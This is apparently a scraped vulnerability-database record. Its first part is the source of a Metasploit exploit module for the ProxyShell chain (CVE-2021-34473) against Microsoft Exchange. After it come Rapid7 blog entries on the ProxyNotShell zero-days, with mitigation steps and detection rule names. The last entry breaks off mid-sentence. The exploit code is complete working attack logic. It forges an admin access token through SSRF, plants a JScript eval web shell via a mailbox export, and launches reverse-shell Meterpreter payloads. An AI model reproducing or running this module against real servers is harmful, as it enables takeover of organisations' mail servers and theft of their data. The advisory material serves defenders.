:windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]), \n]) \n \nregister_advanced_options([ \nOptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']), \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \nCheckCode::Vulnerable \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef request_autodiscover(_server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n'/autodiscover/autodiscover.xml', \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? \n \n{ server: server, legacy_dn: legacy_dn } \nend \n \ndef request_fqdn \nntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nreceived = send_request_raw( \n'method' => 'RPC_IN_DATA', \n'uri' => normalize_uri('rpc', 'rpcproxy.dll'), \n'headers' => { \n'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\" \n} \n) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nif received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i) \nhash = received['WWW-Authenticate'].split('NTLM ')[1] \nmessage = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash)) \ndns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME] \n \nreturn dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase \nend \n \nfail_with(Failure::NotFound, 'No Backend server was found') \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(_server_name, legacy_dn) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n'/mapi/emsmdb', \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response&.code == 200 \nsid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_34473 \nif datastore['BackendServerName'] && !datastore['BackendServerName'].empty? \nserver_name = datastore['BackendServerName'] \nprint_status(\"Internal server name forced to: #{server_name}\") \nelse \nprint_status('Retrieving backend FQDN over RPC request') \nserver_name = request_fqdn \nprint_status(\"Internal server name: #{server_name}\") \nend \n@backend_server_name = server_name \n \n# get information via an autodiscover request. \nprint_status('Sending autodiscover request') \nautodiscover = request_autodiscover(server_name) \n \nprint_status(\"Server: #{autodiscover[:server]}\") \nprint_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\") \n \n# get the user UID using mapi request. \nprint_status('Sending mapi request') \nmailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn]) \nprint_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\") \n \nsend_payload(mailbox_user_sid) \n@common_access_token = build_token(mailbox_user_sid) \nend \n \ndef send_http(method, uri, opts = {}) \nssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nunless opts[:cookie] == :none \nopts[:cookie] = \"Email=#{ssrf}\" \nend \n \nrequest = { \n'method' => method, \n'uri' => \"/#{ssrf}#{uri}\", \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype], \n'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' } \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef send_payload(user_sid) \n@shell_input_name = rand_text_alphanumeric(8..12) \n@draft_subject = rand_text_alphanumeric(8..12) \npayload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\")) \nfile_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\" \nenvelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject) \n \nsend_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8') \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \ndatastore['IISWritePath'].gsub('\\\\', '/') \nelse \ndatastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nend \n \ndef build_token(sid) \nuint8_tlv = proc do |type, value| \ntype + [value.length].pack('C') + value \nend \n \ntoken = uint8_tlv.call('V', \"\\x00\") \ntoken << uint8_tlv.call('T', 'Windows') \ntoken << \"\\x43\\x00\" \ntoken << uint8_tlv.call('A', 'Kerberos') \ntoken << uint8_tlv.call('L', datastore['EMAIL']) \ntoken << uint8_tlv.call('U', sid) \n \n# group data for S-1-5-32-544 \ntoken << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\" \nRex::Text.encode_base64(token) \nend \n \ndef execute_powershell(cmdlet, args: []) \nwinrm = SSRFWinRMConnection.new({ \nendpoint: full_uri('PowerShell/'), \ntransport: :ssrf, \nssrf_proc: proc do |method, uri, opts| \nuri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\" \nuri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nopts[:cookie] = :none \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>}, \n\"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\" \n) \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>}, \n\"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\" \n) \nsend_http(method, uri, opts) \nend \n}) \n \nwinrm.shell(:powershell) do |shell| \nshell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH) \nshell.extend(SSRFWinRMConnection::PowerShell) \nshell.run({ cmdlet: cmdlet, args: args }) \nend \nend \n \ndef exploit \n@ssrf_email ||= Faker::Internet.email \nprint_status('Attempt to exploit for CVE-2021-34473') \nrun_cve_2021_34473 \n \npowershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none) \nfail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200 \n \nprint_status('Assigning the \\'Mailbox Import Export\\' role') \nexecute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ]) \n \n@shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\" \nif datastore['UseAlternatePath'] \nunc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nelse \nunc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nend \n \nnormal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\') \nprint_status(\"Writing to: #{normal_path}\") \nregister_file_for_cleanup(normal_path) \n \n@export_name = rand_text_alphanumeric(8..12) \nexecute_powershell('New-MailboxExportRequest', args: [ \n{ name: '-Name', value: @export_name }, \n{ name: '-Mailbox', value: datastore['EMAIL'] }, \n{ name: '-IncludeFolders', value: '#Drafts#' }, \n{ name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" }, \n{ name: '-ExcludeDumpster' }, \n{ name: '-FilePath', value: unc_path } \n]) \n \nprint_status('Waiting for the export request to complete...') \n30.times do \nif execute_command('whoami')&.code == 200 \nprint_good('The mailbox export request has completed') \nbreak \nend \nsleep 5 \nend \n \nprint_status('Triggering the payload') \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nboundary = rand_text_alphanumeric(8..12) \nresponse = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\") \n \nprint_warning('Dumping command output in response') \nif response.body =~ /START#{boundary}(.*)END#{boundary}/m \nprint_line(Regexp.last_match(1).strip) \nelse \nprint_error('Empty response, no command output') \nend \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \ndef cleanup \nsuper \nreturn unless @common_access_token && @export_name \n \nprint_status('Removing the mailbox export request') \nexecute_powershell('Remove-MailboxExportRequest', args: [ \n{ name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" }, \n{ name: '-Confirm', value: false } \n]) \nend \n \ndef execute_command(cmd, _opts = {}) \nif !cmd_windows_generic? \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\" \nelse \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nend \n \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @shell_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@shell_input_name}=#{cmd}\" \n) \nend \nend \n \nclass PstEncoding \nENCODE_TABLE = [ \n71, 241, 180, 230, 11, 106, 114, 72, \n133, 78, 158, 235, 226, 248, 148, 83, \n224, 187, 160, 2, 232, 90, 9, 171, \n219, 227, 186, 198, 124, 195, 16, 221, \n57, 5, 150, 48, 245, 55, 96, 130, \n140, 201, 19, 74, 107, 29, 243, 251, \n143, 38, 151, 202, 145, 23, 1, 196, \n50, 45, 110, 49, 149, 255, 217, 35, \n209, 0, 94, 121, 220, 68, 59, 26, \n40, 197, 97, 87, 32, 144, 61, 131, \n185, 67, 190, 103, 210, 70, 66, 118, \n192, 109, 91, 126, 178, 15, 22, 41, \n60, 169, 3, 84, 13, 218, 93, 223, \n246, 183, 199, 98, 205, 141, 6, 211, \n105, 92, 134, 214, 20, 247, 165, 102, \n117, 172, 177, 233, 69, 33, 112, 12, \n135, 159, 116, 164, 34, 76, 111, 191, \n31, 86, 170, 46, 179, 120, 51, 80, \n176, 163, 146, 188, 207, 25, 28, 167, \n99, 203, 30, 77, 62, 75, 27, 155, \n79, 231, 240, 238, 173, 58, 181, 89, \n4, 234, 64, 85, 37, 81, 229, 122, \n137, 56, 104, 82, 123, 252, 39, 174, \n215, 189, 250, 7, 244, 204, 142, 95, \n239, 53, 156, 132, 43, 21, 213, 119, \n52, 73, 182, 18, 10, 127, 113, 136, \n253, 157, 24, 65, 125, 147, 216, 88, \n44, 206, 254, 36, 175, 222, 184, 54, \n200, 161, 128, 166, 153, 152, 168, 47, \n14, 129, 101, 115, 228, 194, 162, 138, \n212, 225, 17, 208, 8, 139, 42, 242, \n237, 154, 100, 63, 193, 108, 249, 236 \n].freeze \n \ndef self.encode(data) \nencoded = '' \ndata.each_char do |char| \nencoded << ENCODE_TABLE[char.ord].chr \nend \nencoded \nend \nend \n \nclass XMLTemplate \ndef self.render(template_name, context = nil) \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\") \ntemplate = ::File.binread(file_path) \ncase context \nwhen Hash \nb = binding \nlocals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" } \nb.eval(locals.join) \nelse \nraise ArgumentError \nend \nb.eval(Erubi::Engine.new(template).src) \nend \nend \n \nclass SSRFWinRMConnection < WinRM::Connection \nclass MessageFactory < WinRM::PSRP::MessageFactory \ndef self.create_pipeline_message(runspace_pool_id, pipeline_id, command) \nWinRM::PSRP::Message.new( \nrunspace_pool_id, \nWinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline], \nXMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]), \npipeline_id \n) \nend \nend \n \n# we have to define this class so we can define our own transport factory that provides one backed by the SSRF \n# vulnerability \nclass TransportFactory < WinRM::HTTP::TransportFactory \nclass HttpSsrf < WinRM::HTTP::HttpTransport \n# rubocop:disable Lint/ \ndef initialize(endpoint, options) \n@endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint \n@ssrf_proc = options[:ssrf_proc] \nend \n \ndef send_request(message) \nresp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message }) \nWinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml \nend \nend \n \ndef create_transport(connection_opts) \nraise NotImplementedError unless connection_opts[:transport] == :ssrf \n \nsuper \nend \n \nprivate \n \ndef init_ssrf_transport(opts) \nHttpSsrf.new(opts[:endpoint], opts) \nend \nend \n \nmodule PowerShell \ndef send_command(command, _arguments) \ncommand_id = SecureRandom.uuid.to_s.upcase \nmessage = MessageFactory.create_pipeline_message(@runspace_id, command_id, command) \nfragmenter.fragment(message) do |fragment| \ncommand_args = [connection_opts, shell_id, command_id, fragment] \nif fragment.start_fragment \nresp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build) \ncommand_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text \nelse \ntransport.send_request(WinRM::WSMV::SendData.new(*command_args).build) \nend \nend \n \ncommand_id \nend \nend \n \ndef initialize(connection_opts) \n# these have to be set to truthy values to pass the option validation, but they're not actually used because hax \nconnection_opts.merge!({ user: :ssrf, password: :ssrf }) \nsuper(connection_opts) \nend \n \ndef transport \n@transport ||= begin \ntransport_factory = TransportFactory.new \ntransport_factory.create_transport(@connection_opts) \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163895/exchange_proxyshell_rce.rb.txt"}], "rapid7blog": [{"lastseen": "2022-10-14T19:25:39", "description": "\n\nOn Thursday, September 29, a Vietnamese security firm called GTSC [published information and IOCs](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on what they claimed was a pair of **unpatched** Microsoft Exchange Server vulnerabilities being used in attacks on their customers\u2019 environments dating back to early August 2022. The impact of exploitation, the firm said, is remote code execution. From the information released, both vulnerabilities appeared to be post-authentication flaws. According to GTSC, the vulnerabilities are being exploited to drop webshells on victim systems and establish footholds for post-exploitation behavior. \n\nMicrosoft [confirmed both zero-day vulnerabilities](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) late the evening of September 29, 2022 and said they were aware of \"limited, targeted attacks using the two vulnerabilities to get into users' systems.\" Tracked as CVE-2022-41040 and CVE-2022-41082, neither vulnerability has a patch as of September 30, but Microsoft indicated they're working on an accelerated timeline to release fixes.\n\n * CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability. \n * CVE-2022-41082 allows remote code execution (RCE) when PowerShell is accessible to the attacker.\n\nBoth vulnerabilities require an attacker to have authenticated network access for successful exploitation. The known attacks appear to be a variant of last year's infamous [ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>). **Note: **While attacks using these vulnerabilities have so far chained the two CVEs, it is entirely possible that either could be used alone, or chained with different vulnerabilities.\n\nSecurity researchers have [pointed out](<https://twitter.com/GossiTheDog/status/1575597075118497793>) that there are still plenty of Exchange Server installations not patched or improperly patched for [ProxyShell](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>), which gives attackers an easy way into systems that might otherwise be somewhat more resilient to this latest campaign. As of early September 2022, Rapid7 Labs observed up to **191,000 Exchange Servers exposed to the internet** via port 443. \n\n### Threat intelligence\n\nGTSC's [original blog has extensive details](<https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) on the attacks they observed, including various IOCs, malware analysis, and MITRE ATT&CK mapping. \n\nOn September 30, Microsoft also [published additional information](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) on attacks they have observed using these vulnerabilities: \n\n\"MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.\"\n\n### Mitigation\n\n_**NOTE: **Microsoft has revised the URL Rewrite rule from their mitigation guidance multiple times since this blog came out. Refer to their instructions for the latest guidance._\n\nBoth CVE-2022-41040 and CVE-2022-41082 are unpatched.** **In the absence of a patch, Microsoft has directed on-premises Exchange customers to apply a blocking rule in \u201cIIS Manager -> Default Web Site -> Autodiscover -> URL Rewrite -> Actions\u201d to block the known attack patterns. Organizations should apply the mitigation as Microsoft directs on an emergency basis. \n\n**Microsoft has [full step-by-step URL Rewrite (mitigation) instructions here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). **These instructions have been updated multiple times\u2014check Microsoft's info for the latest.\n\nMicrosoft has confirmed that the URL Rewrite instructions linked above are successful in breaking current attack chains. Authenticated attackers who can access PowerShell Remoting on vulnerable Exchange systems will be able to trigger RCE using CVE-2022-41082. Blocking the ports used for Remote PowerShell can limit these attacks. Therefore, on-premises Exchange customers should review and apply Microsoft's URL Rewrite Instructions **and** block exposed Remote PowerShell ports:\n\n * HTTP: 5985\n * HTTPS: 5986\n\nMicrosoft also \"strongly recommends\" Exchange Server customers [disable](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>) remote PowerShell access for non-admin users.\n\nMicrosoft has said explicitly that Exchange Online Customers do not need to take any action. Note, however, that organizations who use hybrid (a mix of on-prem and cloud) Exchange environments should follow on-prem guidance. See [Microsoft's official blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) for more details. \n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-41040 and CVE-2022-41082 with a remote vulnerability check available in the September 30, 2022 content-only release ( Jar UpdateID: 144473189). The check will identify whether Microsoft's recommended mitigations have been applied. Customers can also use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) or [Dynamic Asset Groups](<https://docs.rapid7.com/nexpose/working-with-asset-groups/>) to identify systems that have Exchange installed on them. \n\n**Note: **Microsoft has revised their recommended URL Rewrite rule several times since October 4. Our vulnerability check has been updated as of the **October 12, 2022 content-only** release to identify the improved mitigation in Microsoft's guidance. \n\nThe behavior described in GTSC's blog is similar to other attacks targeting Exchange over the past 18 months. Rapid7\u2019s InsightIDR and Managed Detection & Response (MDR) customers have detection coverage for currently known post-exploitation attacker behaviors, including but not limited to:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Suspicious Process - Exchange Server Spawns Process\n * Attacker Technique - CertUtil With URLCache Flag\n * Webshell - China Chopper Executing Commands\n * Suspicious Process - Executable Runs From C:\\Perflogs\n\nFor InsightIDR customers, we recommend reviewing the rule action and priority of these detection rules to confirm that they align with their security** **needs. As always, MDR customers are being actively monitored by the Rapid7 SOC. If suspicious activity is detected in your environment, you will be contacted by your customer advisor.\n\nWe will update this blog with further information, including coverage additions or enhancements, as needed.\n\n### Updates\n\n**September 30, 2022: **Microsoft has confirmed two new zero-day vulnerabilities, CVE-2022-41040 and CVE-2022-41082, are being exploited in \"limited, targeted attacks.\" Microsoft has released mitigation guidance. Our engineering teams are investigating options to allow InsightVM and Nexpose customers to assess exposure to these vulnerabilities. InsightIDR customers have existing detection coverage. \n**[16:30 ET]** Updated information on newly released InsightVM and Nexpose vulnerability checks. \n\n**October 1, 2022: **Clarified wording and directions in _Mitigations _section, added a _Threat intelligence_ section with [Microsoft's analysis](<https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) of attacks using these vulnerabilities. \n\n**October 4, 2022: **Microsoft published updated mitigation guidance that includes an improvement to their URL Rewrite rule. The string contained in the recommended rule has been modified to be more effective. [Full instructions are here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Our researchers are evaluating whether adjustments to our existing vulnerability checks are required based on Microsoft\u2019s new guidance. \n\n**October 5, 2022: **Our vulnerability check for InsightVM and Nexpose customers will be updated to identify the improved mitigation in Microsoft's revised guidance; this update will go out in the October 5, 2022 content-only release.\n\n**October 11, 2022: **Microsoft made additional improvements to their URL Rewrite rule instructions on October 7 and October 8. Full details are in their [blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). The vulnerabilities are still unpatched as of the October 11, 2022 Patch Tuesday release. \n\n**October 12, 2022: **Our engineering team has updated checks for these vulnerabilities in the October 12 content-only release. The updates look for the revised URL Rewrite rule in Microsoft's recommended mitigation guidance. \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-29T20:50:50", "type": "rapid7blog", "title": "CVE-2022-41040 and CVE-2022-41082: Unpatched Zero-Day Vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-29T20:50:50", "id": "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "href": "https://blog.rapid7.com/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-02T22:08:54", "description": "## ProxyNotShell\n\n\n\nThis week's Metasploit release includes an exploit module for `CVE-2022-41082`, AKA ProxyNotShell by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, [Orange Tsai](<https://github.com/orangetw>), [Piotr Bazyd\u0142o](<https://mobile.twitter.com/chudypb>), [Rich Warren](<https://twitter.com/buffaloverflow>), [Soroush Dalili](<https://twitter.com/irsdl>), and our very own [Spencer McIntyre](<https://github.com/zeroSteiner>). The vulnerability `CVE-2022-41082`, AKA ProxyNotShell is a deserialization flaw in Microsoft Exchange's PSRP backend. Microsoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. For more information, see [CVE-2022-41082](<https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082?referrer=blog>) and [CONTROL YOUR TYPES OR GET PWNED](<https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend>). The ProxyNotShell 